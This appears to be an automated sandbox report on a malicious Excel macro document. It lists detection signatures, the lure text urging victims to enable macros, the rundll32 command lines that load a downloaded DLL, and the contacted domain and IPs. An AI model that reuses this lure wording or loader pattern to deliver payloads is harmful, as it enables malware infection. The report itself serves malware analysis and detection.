Loading ...

Play interactive tourEdit tour

Analysis Report 0b31c0f0_by_Libranalysis.xls

Overview

General Information

Sample Name:0b31c0f0_by_Libranalysis.xls
Analysis ID:412660
MD5:0b31c0f0844b5541f94f915757c4ba61
SHA1:4be1acd410a4e696278657309cd4de7874055991
SHA256:d59102c1a562711ef640e8e278477d0b7fd460667a9e8cf20b44603cc594999a
Tags:SilentBuilder
Infos:

Most interesting Screenshot:

Detection

Hidden Macro 4.0
Score:76
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Found Excel 4.0 Macro with suspicious formulas
Found abnormal large hidden Excel 4.0 Macro sheet
Sigma detected: Microsoft Office Product Spawning Windows Shell
Document contains embedded VBA macros
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)

Classification

Startup

  • System is w10x64
  • EXCEL.EXE (PID: 5108 cmdline: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding MD5: 5D6638F2C8F8571C593999C58866007E)
    • rundll32.exe (PID: 6256 cmdline: rundll32 ..\ritofm.cvm,DllRegisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 6288 cmdline: rundll32 ..\ritofm.cvm1,DllRegisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

System Summary:

barindex
Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: rundll32 ..\ritofm.cvm,DllRegisterServer, CommandLine: rundll32 ..\ritofm.cvm,DllRegisterServer, CommandLine|base64offset|contains: ], Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, ParentProcessId: 5108, ProcessCommandLine: rundll32 ..\ritofm.cvm,DllRegisterServer, ProcessId: 6256

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

barindex
Multi AV Scanner detection for submitted fileShow sources
Source: 0b31c0f0_by_Libranalysis.xlsReversingLabs: Detection: 10%
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dllJump to behavior
Source: unknownHTTPS traffic detected: 192.185.39.58:443 -> 192.168.2.3:49707 version: TLS 1.2
Source: unknownHTTPS traffic detected: 192.185.32.232:443 -> 192.168.2.3:49709 version: TLS 1.2

Software Vulnerabilities:

barindex
Document exploit detected (UrlDownloadToFile)Show sources
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXESection loaded: unknown origin: URLDownloadToFileAJump to behavior
Document exploit detected (process start blacklist hit)Show sources
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\rundll32.exe
Source: global trafficDNS query: name: signifysystem.com
Source: global trafficTCP traffic: 192.168.2.3:49707 -> 192.185.39.58:443
Source: global trafficTCP traffic: 192.168.2.3:49707 -> 192.185.39.58:443
Source: Joe Sandbox ViewIP Address: 192.185.39.58 192.185.39.58
Source: Joe Sandbox ViewIP Address: 192.185.32.232 192.185.32.232
Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: unknownDNS traffic detected: queries for: signifysystem.com
Source: F29B1D57-CE95-4888-B145-4A6EF177D137.0.drString found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
Source: F29B1D57-CE95-4888-B145-4A6EF177D137.0.drString found in binary or memory: http://weather.service.msn.com/data.aspx
Source: F29B1D57-CE95-4888-B145-4A6EF177D137.0.drString found in binary or memory: https://addinsinstallation.store.office.com/app/download
Source: F29B1D57-CE95-4888-B145-4A6EF177D137.0.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/preinstalled
Source: F29B1D57-CE95-4888-B145-4A6EF177D137.0.drString found in binary or memory: https://addinslicensing.store.office.com/commerce/query
Source: F29B1D57-CE95-4888-B145-4A6EF177D137.0.drString found in binary or memory: https://analysis.windows.net/powerbi/api
Source: F29B1D57-CE95-4888-B145-4A6EF177D137.0.drString found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: F29B1D57-CE95-4888-B145-4A6EF177D137.0.drString found in binary or memory: https://api.aadrm.com/
Source: F29B1D57-CE95-4888-B145-4A6EF177D137.0.drString found in binary or memory: https://api.addins.omex.office.net/appinfo/query
Source: F29B1D57-CE95-4888-B145-4A6EF177D137.0.drString found in binary or memory: https://api.addins.omex.office.net/appstate/query
Source: F29B1D57-CE95-4888-B145-4A6EF177D137.0.drString found in binary or memory: https://api.addins.store.office.com/app/query
Source: F29B1D57-CE95-4888-B145-4A6EF177D137.0.drString found in binary or memory: https://api.cortana.ai
Source: F29B1D57-CE95-4888-B145-4A6EF177D137.0.drString found in binary or memory: https://api.diagnostics.office.com
Source: F29B1D57-CE95-4888-B145-4A6EF177D137.0.drString found in binary or memory: https://api.diagnosticssdf.office.com
Source: F29B1D57-CE95-4888-B145-4A6EF177D137.0.drString found in binary or memory: https://api.microsoftstream.com/api/
Source: F29B1D57-CE95-4888-B145-4A6EF177D137.0.drString found in binary or memory: https://api.office.net
Source: F29B1D57-CE95-4888-B145-4A6EF177D137.0.drString found in binary or memory: https://api.onedrive.com
Source: F29B1D57-CE95-4888-B145-4A6EF177D137.0.drString found in binary or memory: https://api.powerbi.com/beta/myorg/imports
Source: F29B1D57-CE95-4888-B145-4A6EF177D137.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
Source: F29B1D57-CE95-4888-B145-4A6EF177D137.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
Source: F29B1D57-CE95-4888-B145-4A6EF177D137.0.drString found in binary or memory: https://apis.live.net/v5.0/
Source: F29B1D57-CE95-4888-B145-4A6EF177D137.0.drString found in binary or memory: https://arc.msn.com/v4/api/selection
Source: F29B1D57-CE95-4888-B145-4A6EF177D137.0.drString found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
Source: F29B1D57-CE95-4888-B145-4A6EF177D137.0.drString found in binary or memory: https://augloop.office.com
Source: F29B1D57-CE95-4888-B145-4A6EF177D137.0.drString found in binary or memory: https://augloop.office.com/v2
Source: F29B1D57-CE95-4888-B145-4A6EF177D137.0.drString found in binary or memory: https://autodiscover-s.outlook.com/
Source: F29B1D57-CE95-4888-B145-4A6EF177D137.0.drString found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
Source: F29B1D57-CE95-4888-B145-4A6EF177D137.0.drString found in binary or memory: https://cdn.entity.
Source: F29B1D57-CE95-4888-B145-4A6EF177D137.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
Source: F29B1D57-CE95-4888-B145-4A6EF177D137.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
Source: F29B1D57-CE95-4888-B145-4A6EF177D137.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
Source: F29B1D57-CE95-4888-B145-4A6EF177D137.0.drString found in binary or memory: https://client-office365-tas.msedge.net/ab
Source: F29B1D57-CE95-4888-B145-4A6EF177D137.0.drString found in binary or memory: https://clients.config.office.net/
Source: F29B1D57-CE95-4888-B145-4A6EF177D137.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
Source: F29B1D57-CE95-4888-B145-4A6EF177D137.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/ios
Source: F29B1D57-CE95-4888-B145-4A6EF177D137.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/mac
Source: F29B1D57-CE95-4888-B145-4A6EF177D137.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
Source: F29B1D57-CE95-4888-B145-4A6EF177D137.0.drString found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
Source: F29B1D57-CE95-4888-B145-4A6EF177D137.0.drString found in binary or memory: https://config.edge.skype.com
Source: F29B1D57-CE95-4888-B145-4A6EF177D137.0.drString found in binary or memory: https://config.edge.skype.com/config/v1/Office
Source: F29B1D57-CE95-4888-B145-4A6EF177D137.0.drString found in binary or memory: https://config.edge.skype.com/config/v2/Office
Source: F29B1D57-CE95-4888-B145-4A6EF177D137.0.drString found in binary or memory: https://cortana.ai
Source: F29B1D57-CE95-4888-B145-4A6EF177D137.0.drString found in binary or memory: https://cortana.ai/api
Source: F29B1D57-CE95-4888-B145-4A6EF177D137.0.drString found in binary or memory: https://cr.office.com
Source: F29B1D57-CE95-4888-B145-4A6EF177D137.0.drString found in binary or memory: https://dataservice.o365filtering.com
Source: F29B1D57-CE95-4888-B145-4A6EF177D137.0.drString found in binary or memory: https://dataservice.o365filtering.com/
Source: F29B1D57-CE95-4888-B145-4A6EF177D137.0.drString found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
Source: F29B1D57-CE95-4888-B145-4A6EF177D137.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: F29B1D57-CE95-4888-B145-4A6EF177D137.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
Source: F29B1D57-CE95-4888-B145-4A6EF177D137.0.drString found in binary or memory: https://dev.cortana.ai
Source: F29B1D57-CE95-4888-B145-4A6EF177D137.0.drString found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
Source: F29B1D57-CE95-4888-B145-4A6EF177D137.0.drString found in binary or memory: https://dev0-api.acompli.net/autodetect
Source: F29B1D57-CE95-4888-B145-4A6EF177D137.0.drString found in binary or memory: https://devnull.onenote.com
Source: F29B1D57-CE95-4888-B145-4A6EF177D137.0.drString found in binary or memory: https://directory.services.
Source: F29B1D57-CE95-4888-B145-4A6EF177D137.0.drString found in binary or memory: https://ecs.office.com/config/v2/Office
Source: F29B1D57-CE95-4888-B145-4A6EF177D137.0.drString found in binary or memory: https://entitlement.diagnostics.office.com
Source: F29B1D57-CE95-4888-B145-4A6EF177D137.0.drString found in binary or memory: https://entitlement.diagnosticssdf.office.com
Source: F29B1D57-CE95-4888-B145-4A6EF177D137.0.drString found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: F29B1D57-CE95-4888-B145-4A6EF177D137.0.drString found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
Source: F29B1D57-CE95-4888-B145-4A6EF177D137.0.drString found in binary or memory: https://globaldisco.crm.dynamics.com
Source: F29B1D57-CE95-4888-B145-4A6EF177D137.0.drString found in binary or memory: https://graph.ppe.windows.net
Source: F29B1D57-CE95-4888-B145-4A6EF177D137.0.drString found in binary or memory: https://graph.ppe.windows.net/
Source: F29B1D57-CE95-4888-B145-4A6EF177D137.0.drString found in binary or memory: https://graph.windows.net
Source: F29B1D57-CE95-4888-B145-4A6EF177D137.0.drString found in binary or memory: https://graph.windows.net/
Source: F29B1D57-CE95-4888-B145-4A6EF177D137.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
Source: F29B1D57-CE95-4888-B145-4A6EF177D137.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?
Source: F29B1D57-CE95-4888-B145-4A6EF177D137.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
Source: F29B1D57-CE95-4888-B145-4A6EF177D137.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
Source: F29B1D57-CE95-4888-B145-4A6EF177D137.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
Source: F29B1D57-CE95-4888-B145-4A6EF177D137.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
Source: F29B1D57-CE95-4888-B145-4A6EF177D137.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
Source: F29B1D57-CE95-4888-B145-4A6EF177D137.0.drString found in binary or memory: https://incidents.diagnostics.office.com
Source: F29B1D57-CE95-4888-B145-4A6EF177D137.0.drString found in binary or memory: https://incidents.diagnosticssdf.office.com
Source: F29B1D57-CE95-4888-B145-4A6EF177D137.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
Source: F29B1D57-CE95-4888-B145-4A6EF177D137.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
Source: F29B1D57-CE95-4888-B145-4A6EF177D137.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
Source: F29B1D57-CE95-4888-B145-4A6EF177D137.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
Source: F29B1D57-CE95-4888-B145-4A6EF177D137.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
Source: F29B1D57-CE95-4888-B145-4A6EF177D137.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
Source: F29B1D57-CE95-4888-B145-4A6EF177D137.0.drString found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
Source: F29B1D57-CE95-4888-B145-4A6EF177D137.0.drString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
Source: F29B1D57-CE95-4888-B145-4A6EF177D137.0.drString found in binary or memory: https://lifecycle.office.com
Source: F29B1D57-CE95-4888-B145-4A6EF177D137.0.drString found in binary or memory: https://login.microsoftonline.com/
Source: F29B1D57-CE95-4888-B145-4A6EF177D137.0.drString found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
Source: F29B1D57-CE95-4888-B145-4A6EF177D137.0.drString found in binary or memory: https://login.windows.local
Source: F29B1D57-CE95-4888-B145-4A6EF177D137.0.drString found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
Source: F29B1D57-CE95-4888-B145-4A6EF177D137.0.drString found in binary or memory: https://login.windows.net/common/oauth2/authorize
Source: F29B1D57-CE95-4888-B145-4A6EF177D137.0.drString found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
Source: F29B1D57-CE95-4888-B145-4A6EF177D137.0.drString found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
Source: F29B1D57-CE95-4888-B145-4A6EF177D137.0.drString found in binary or memory: https://management.azure.com
Source: F29B1D57-CE95-4888-B145-4A6EF177D137.0.drString found in binary or memory: https://management.azure.com/
Source: F29B1D57-CE95-4888-B145-4A6EF177D137.0.drString found in binary or memory: https://messaging.office.com/
Source: F29B1D57-CE95-4888-B145-4A6EF177D137.0.drString found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
Source: F29B1D57-CE95-4888-B145-4A6EF177D137.0.drString found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: F29B1D57-CE95-4888-B145-4A6EF177D137.0.drString found in binary or memory: https://ncus.contentsync.
Source: F29B1D57-CE95-4888-B145-4A6EF177D137.0.drString found in binary or memory: https://ncus.pagecontentsync.
Source: F29B1D57-CE95-4888-B145-4A6EF177D137.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
Source: F29B1D57-CE95-4888-B145-4A6EF177D137.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
Source: F29B1D57-CE95-4888-B145-4A6EF177D137.0.drString found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
Source: F29B1D57-CE95-4888-B145-4A6EF177D137.0.drString found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
Source: F29B1D57-CE95-4888-B145-4A6EF177D137.0.drString found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
Source: F29B1D57-CE95-4888-B145-4A6EF177D137.0.drString found in binary or memory: https://officeapps.live.com
Source: F29B1D57-CE95-4888-B145-4A6EF177D137.0.drString found in binary or memory: https://officeci.azurewebsites.net/api/
Source: F29B1D57-CE95-4888-B145-4A6EF177D137.0.drString found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
Source: F29B1D57-CE95-4888-B145-4A6EF177D137.0.drString found in binary or memory: https://officesetup.getmicrosoftkey.com
Source: F29B1D57-CE95-4888-B145-4A6EF177D137.0.drString found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
Source: F29B1D57-CE95-4888-B145-4A6EF177D137.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities
Source: F29B1D57-CE95-4888-B145-4A6EF177D137.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
Source: F29B1D57-CE95-4888-B145-4A6EF177D137.0.drString found in binary or memory: https://onedrive.live.com
Source: F29B1D57-CE95-4888-B145-4A6EF177D137.0.drString found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
Source: F29B1D57-CE95-4888-B145-4A6EF177D137.0.drString found in binary or memory: https://onedrive.live.com/embed?
Source: F29B1D57-CE95-4888-B145-4A6EF177D137.0.drString found in binary or memory: https://outlook.office.com/
Source: F29B1D57-CE95-4888-B145-4A6EF177D137.0.drString found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
Source: F29B1D57-CE95-4888-B145-4A6EF177D137.0.drString found in binary or memory: https://outlook.office365.com/
Source: F29B1D57-CE95-4888-B145-4A6EF177D137.0.drString found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
Source: F29B1D57-CE95-4888-B145-4A6EF177D137.0.drString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
Source: F29B1D57-CE95-4888-B145-4A6EF177D137.0.drString found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
Source: F29B1D57-CE95-4888-B145-4A6EF177D137.0.drString found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
Source: F29B1D57-CE95-4888-B145-4A6EF177D137.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
Source: F29B1D57-CE95-4888-B145-4A6EF177D137.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
Source: F29B1D57-CE95-4888-B145-4A6EF177D137.0.drString found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
Source: F29B1D57-CE95-4888-B145-4A6EF177D137.0.drString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
Source: F29B1D57-CE95-4888-B145-4A6EF177D137.0.drString found in binary or memory: https://powerlift-frontdesk.acompli.net
Source: F29B1D57-CE95-4888-B145-4A6EF177D137.0.drString found in binary or memory: https://powerlift.acompli.net
Source: F29B1D57-CE95-4888-B145-4A6EF177D137.0.drString found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
Source: F29B1D57-CE95-4888-B145-4A6EF177D137.0.drString found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
Source: F29B1D57-CE95-4888-B145-4A6EF177D137.0.drString found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
Source: F29B1D57-CE95-4888-B145-4A6EF177D137.0.drString found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
Source: F29B1D57-CE95-4888-B145-4A6EF177D137.0.drString found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
Source: F29B1D57-CE95-4888-B145-4A6EF177D137.0.drString found in binary or memory: https://settings.outlook.com
Source: F29B1D57-CE95-4888-B145-4A6EF177D137.0.drString found in binary or memory: https://shell.suite.office.com:1443
Source: F29B1D57-CE95-4888-B145-4A6EF177D137.0.drString found in binary or memory: https://skyapi.live.net/Activity/
Source: F29B1D57-CE95-4888-B145-4A6EF177D137.0.drString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
Source: F29B1D57-CE95-4888-B145-4A6EF177D137.0.drString found in binary or memory: https://staging.cortana.ai
Source: F29B1D57-CE95-4888-B145-4A6EF177D137.0.drString found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
Source: F29B1D57-CE95-4888-B145-4A6EF177D137.0.drString found in binary or memory: https://store.office.cn/addinstemplate
Source: F29B1D57-CE95-4888-B145-4A6EF177D137.0.drString found in binary or memory: https://store.office.com/?productgroup=Outlook
Source: F29B1D57-CE95-4888-B145-4A6EF177D137.0.drString found in binary or memory: https://store.office.com/addinstemplate
Source: F29B1D57-CE95-4888-B145-4A6EF177D137.0.drString found in binary or memory: https://store.office.de/addinstemplate
Source: F29B1D57-CE95-4888-B145-4A6EF177D137.0.drString found in binary or memory: https://store.officeppe.com/addinstemplate
Source: F29B1D57-CE95-4888-B145-4A6EF177D137.0.drString found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: F29B1D57-CE95-4888-B145-4A6EF177D137.0.drString found in binary or memory: https://tasks.office.com
Source: F29B1D57-CE95-4888-B145-4A6EF177D137.0.drString found in binary or memory: https://templatelogging.office.com/client/log
Source: F29B1D57-CE95-4888-B145-4A6EF177D137.0.drString found in binary or memory: https://uci.cdn.office.net/mirrored/smartlookup/current/
Source: F29B1D57-CE95-4888-B145-4A6EF177D137.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
Source: F29B1D57-CE95-4888-B145-4A6EF177D137.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
Source: F29B1D57-CE95-4888-B145-4A6EF177D137.0.drString found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
Source: F29B1D57-CE95-4888-B145-4A6EF177D137.0.drString found in binary or memory: https://web.microsoftstream.com/video/
Source: F29B1D57-CE95-4888-B145-4A6EF177D137.0.drString found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
Source: F29B1D57-CE95-4888-B145-4A6EF177D137.0.drString found in binary or memory: https://webshell.suite.office.com
Source: F29B1D57-CE95-4888-B145-4A6EF177D137.0.drString found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
Source: F29B1D57-CE95-4888-B145-4A6EF177D137.0.drString found in binary or memory: https://wus2.contentsync.
Source: F29B1D57-CE95-4888-B145-4A6EF177D137.0.drString found in binary or memory: https://wus2.pagecontentsync.
Source: F29B1D57-CE95-4888-B145-4A6EF177D137.0.drString found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
Source: F29B1D57-CE95-4888-B145-4A6EF177D137.0.drString found in binary or memory: https://www.odwebp.svc.ms
Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
Source: unknownHTTPS traffic detected: 192.185.39.58:443 -> 192.168.2.3:49707 version: TLS 1.2
Source: unknownHTTPS traffic detected: 192.185.32.232:443 -> 192.168.2.3:49709 version: TLS 1.2

System Summary:

barindex
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
Source: Screenshot number: 8Screenshot OCR: Enable Editing 11" from the yellow bar above 12 ,, , 13" Once You have Enable Editing, please c
Source: Screenshot number: 8Screenshot OCR: Enable Content 14_ from the yellow bar above 15 16 I i 17" ,,_ WHY I CANNOT OPEN THIS DOCUMENT
Source: Document image extraction number: 5Screenshot OCR: Enable Editing from the yellow bar above Once You have Enable Editing, please click Enable Content
Source: Document image extraction number: 5Screenshot OCR: Enable Content from the yellow bar above WHY I CANNOT OPEN THIS DOCUMENT? You are using iOS or An
Source: Document image extraction number: 14Screenshot OCR: Enable Editing from the yellow bar above Once You have Enable Editing, please click Enable Conte
Source: Document image extraction number: 14Screenshot OCR: Enable Content from the yellow bar above WHY I CANNOT OPEN THIS DOCUMENT? w You are using IDS or
Source: Screenshot number: 12Screenshot OCR: Enable Editing from the yellow bar above Once You have Enable Editing, please click Enable Conte
Source: Screenshot number: 12Screenshot OCR: Enable Content from the yellow bar above O Q WHY I CANNOT OPEN THIS DOCUMENT ? W You are using i
Found Excel 4.0 Macro with suspicious formulasShow sources
Source: 0b31c0f0_by_Libranalysis.xlsInitial sample: CALL
Source: 0b31c0f0_by_Libranalysis.xlsInitial sample: CALL
Source: 0b31c0f0_by_Libranalysis.xlsInitial sample: EXEC
Found abnormal large hidden Excel 4.0 Macro sheetShow sources
Source: 0b31c0f0_by_Libranalysis.xlsInitial sample: Sheet size: 14902
Source: 0b31c0f0_by_Libranalysis.xlsOLE indicator, VBA macros: true
Source: classification engineClassification label: mal76.expl.evad.winXLS@5/6@2/2
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCacheJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\{70255295-DBA1-4FA3-B41C-53F40C9D4371} - OProcSessId.datJump to behavior
Source: 0b31c0f0_by_Libranalysis.xlsOLE indicator, Workbook stream: true
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\ritofm.cvm,DllRegisterServer
Source: 0b31c0f0_by_Libranalysis.xlsReversingLabs: Detection: 10%
Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\ritofm.cvm,DllRegisterServer
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\ritofm.cvm1,DllRegisterServer
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\ritofm.cvm,DllRegisterServerJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\ritofm.cvm1,DllRegisterServerJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguagesJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dllJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
